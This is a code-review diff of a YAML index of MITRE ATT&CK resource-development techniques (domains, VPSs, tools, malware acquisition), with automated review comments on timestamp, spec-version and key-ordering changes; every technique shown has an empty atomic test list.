- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
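Review bot: the `description` block for T1583.001 now mixes paragraph separators: blank lines are inserted before the new "Different URIs/URLs..." and "In addition to legitimately purchasing..." paragraphs, but the existing "Adversaries may also acquire and repurpose expired domains..." and "Domain registrars each maintain..." paragraphs still follow each other without one. Inside a `|-` literal block the blank lines become `\n\n` and the others `\n`, so rendered output will show uneven paragraph spacing; if this mirrors the upstream text it is fine to keep, otherwise normalise it. The new Route53 paragraph cites `Invictus IR DangerDev 2024`, which a later hunk adds to `external_references`, and the `x_mitre_version` bump to `'1.4'` follows in the next hunk.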
@@ -53031,7 +53704,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -53070,6 +53743,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -53125,7 +53802,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -53183,7 +53859,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -53263,7 +53938,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -53323,7 +53997,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -53345,7 +54018,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -53364,42 +54037,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
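Review bot: this 30-line removal is a key reorder, not a content deletion: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the full `external_references` list for T1583.003 reappear after `x_mitre_data_sources` in the next hunk, with the references themselves reordered (Koczwara first instead of TrendMicro). Only `modified` actually changes here. Emitting keys and references in a fixed order from the generator would make this a one-line hunk and make future reviews of this index much easier.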
@@ -53408,22 +54049,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
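Review bot: for T1583.003, `modified` advances to `2024-10-15T13:22:11.113Z` while `x_mitre_version` stays `'1.1'` and neither `description` nor `x_mitre_detection` changes in this hunk; the visible differences are the added `x_mitre_deprecated: false`, `revoked: false`, `x_mitre_attack_spec_version: 3.2.0` and the re-ordered `external_references`. That is consistent with an upstream metadata-only refresh, but a timestamp bump with no version bump is worth a spot check against the upstream object `attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795` before merging.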
@@ -53437,7 +54109,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -53524,11 +54196,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -53588,7 +54259,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -53630,7 +54300,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53645,7 +54315,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -53736,11 +54405,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -53773,15 +54441,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
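Review bot: the only wording change inside the rewrapped T1608.005 description is the parenthetical `(including one-time, single use links)`; everything else in those lines is YAML refolding. The description edits for T1584.007 and T1608.006 in this same patch arrive with an `x_mitre_version` bump from 1.0 to 1.1, but no version line is visible in this hunk, so check that the `x_mitre_version` further down this object was updated too (or that upstream deliberately left it unchanged).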
@@ -53865,7 +54534,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -53919,7 +54587,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -53970,36 +54637,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -54008,21 +54649,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
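Review bot: nearly all of this hunk is key reordering (platforms, domains, contributors and `external_references` moved below the description), which buries the three substantive changes for T1588.002: `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, `revoked: false` and `x_mitre_deprecated: false` added, and the Recorded Future reference moved to `https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers` with the retrieved date refreshed. If the generator can emit keys in a stable order (or keep the previous order), future diffs for these objects become reviewable. The `external_references` order also changed; that is harmless only as long as nothing addresses references by position instead of `source_name`.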
@@ -54068,17 +54735,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -54104,7 +54770,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -54136,8 +54802,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
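Review bot: both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed for T1585.001 and no replacement `x_mitre_attack_spec_version` appears in this hunk, unlike T1588.002, T1588 and T1587 where it comes back as 3.2.0 in the rebuilt object. Together with this object's `modified` date moving back to 2021-10-16 in the previous hunk, T1585.001 now looks like a pre-2022 STIX object. Check whether the field is emitted elsewhere in the object; if not, the entry has silently lost its ATT&CK spec version and should be regenerated from the same release as the 2024 entries.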
@@ -54164,7 +54828,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -54188,8 +54852,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -54215,7 +54877,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -54249,8 +54911,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -54298,7 +54958,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -54314,7 +54974,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -54373,54 +55032,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
